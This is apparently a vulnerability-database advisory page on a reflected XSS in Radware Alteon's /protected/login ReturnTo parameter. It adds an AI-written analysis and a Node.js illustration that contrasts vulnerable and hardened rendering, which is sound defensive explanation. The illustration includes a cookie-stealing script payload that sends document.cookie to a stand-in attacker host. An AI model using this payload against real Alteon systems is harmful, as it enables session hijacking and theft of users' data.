VYPR
Medium severity (CVSS 6.1) · NVD Advisory · Published Apr 14, 2026 · Updated Apr 21, 2026

CVE-2026-5754

Description

Reflected Cross-Site Scripting (XSS) Vulnerability in Radware Alteon 34.5.4.0 vADC load-balancer allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized actions, data theft, or other malicious activities.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Reflected XSS in Radware Alteon 34.5.4.0 via unsanitized ReturnTo parameter allows script injection in victim's browser.

Vulnerability

Overview

A reflected Cross-Site Scripting (XSS) vulnerability exists in Radware Alteon version 34.5.4.0, specifically in the ReturnTo parameter of the /protected/login route. The root cause is missing input validation and output encoding: when a user is redirected to the Microsoft SAML login page, the load-balancer reflects the ReturnTo value into its response unsanitized, so attacker-controlled markup in that parameter becomes part of the page and any script it carries runs in the user's browser [1].

Exploitation

An attacker crafts a link to /protected/login whose ReturnTo parameter carries an XSS payload and delivers it to the victim (by email, chat, or a page under the attacker's control). When the victim follows the link, the load-balancer reflects the payload in the login response, and the attacker's JavaScript executes in the victim's browser within the origin of the Alteon login page. No authentication is required to trigger the vulnerability, so it is reachable by unauthenticated remote attackers; the victim's own session, if any, is what the script then operates on [1].
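The reflection mechanics described above, as an added illustration that is not Alteon code and not Radware's fix (no patch was available when this page was written): a small Node.js model of a login route that interpolates ReturnTo straight into HTML, beside a hardened version that allow-lists a same-site relative path and HTML-escapes it before rendering. The route /protected/login and the parameter name ReturnTo are taken from the advisory; the host lb.example.com, the attacker payload, and every function name are assumptions made for this example.

```javascript
// Hypothetical model of the reflected-XSS bug class in CVE-2026-5754.
// Written for this page; not Radware Alteon code. Only the route name
// (/protected/login) and parameter name (ReturnTo) come from the advisory;
// the host, payload and function names are assumed.

const BASE_ORIGIN = "https://lb.example.com"; // assumed load-balancer origin

// Constructed attacker link: the payload travels in the ReturnTo query
// parameter and is URL-encoded exactly as a browser would send it.
const PAYLOAD =
  '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';
const ATTACK_URL =
  BASE_ORIGIN + "/protected/login?ReturnTo=" + encodeURIComponent(PAYLOAD);

// Extract ReturnTo as the server sees it after URL-decoding.
function getReturnTo(requestUrl) {
  return new URL(requestUrl).searchParams.get("ReturnTo") ?? "/";
}

// Vulnerable rendering: the decoded parameter is placed in the HTML verbatim.
// The payload's leading '">' closes the href attribute and the <a> tag, so the
// <script> element that follows is parsed as page markup.
function renderLoginVulnerable(requestUrl) {
  const returnTo = getReturnTo(requestUrl);
  return `<html><body>
<p>Redirecting to the identity provider...</p>
<a href="${returnTo}">Continue</a>
</body></html>`;
}

// Minimal HTML attribute/text escaper (contextual output encoding).
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Allow-list the redirect target: a single leading "/", no "//" authority,
// only unreserved/sub-delimiter URL characters, and it must still resolve to
// our own origin. Anything else falls back to "/". This also blocks the
// open-redirect twin of this bug (javascript:, https://attacker...).
function safeReturnTo(value) {
  if (typeof value !== "string") return "/";
  if (!/^\/(?!\/)[A-Za-z0-9._~!$&'()*+,;=:@%\/?#\[\]-]*$/.test(value)) return "/";
  const resolved = new URL(value, BASE_ORIGIN);
  if (resolved.origin !== BASE_ORIGIN) return "/";
  return value;
}

// Hardened rendering: validate first, then encode for the HTML context.
function renderLoginHardened(requestUrl) {
  const returnTo = escapeHtml(safeReturnTo(getReturnTo(requestUrl)));
  return `<html><body>
<p>Redirecting to the identity provider...</p>
<a href="${returnTo}">Continue</a>
</body></html>`;
}

// Stand-alone demo: the vulnerable page contains a live <script> element,
// the hardened page does not.
console.log("vulnerable reflects payload:",
  renderLoginVulnerable(ATTACK_URL).includes("<script>"));
console.log("hardened reflects payload:",
  renderLoginHardened(ATTACK_URL).includes("<script>"));
```

The two fixes are independent and both matter: escaping alone would stop the markup injection but still let ReturnTo steer users to an attacker-chosen site, and the allow-list alone would not protect a future template that reflects the value into a different context. Running the block with `node` prints `true` for the vulnerable renderer and `false` for the hardened one.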

Impact

Successful exploitation allows arbitrary JavaScript execution in the victim's browser, potentially leading to session cookie theft, data exfiltration, unauthorized actions on behalf of the victim, phishing attacks, and damage to the website's reputation [1].

Mitigation

Status

As of the publication date, Radware has acknowledged the vulnerability in their customer portal and plans to release a patch in a future version. No patch or workaround has been publicly available at the time of disclosure [1].

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

References: 2

News mentions: 1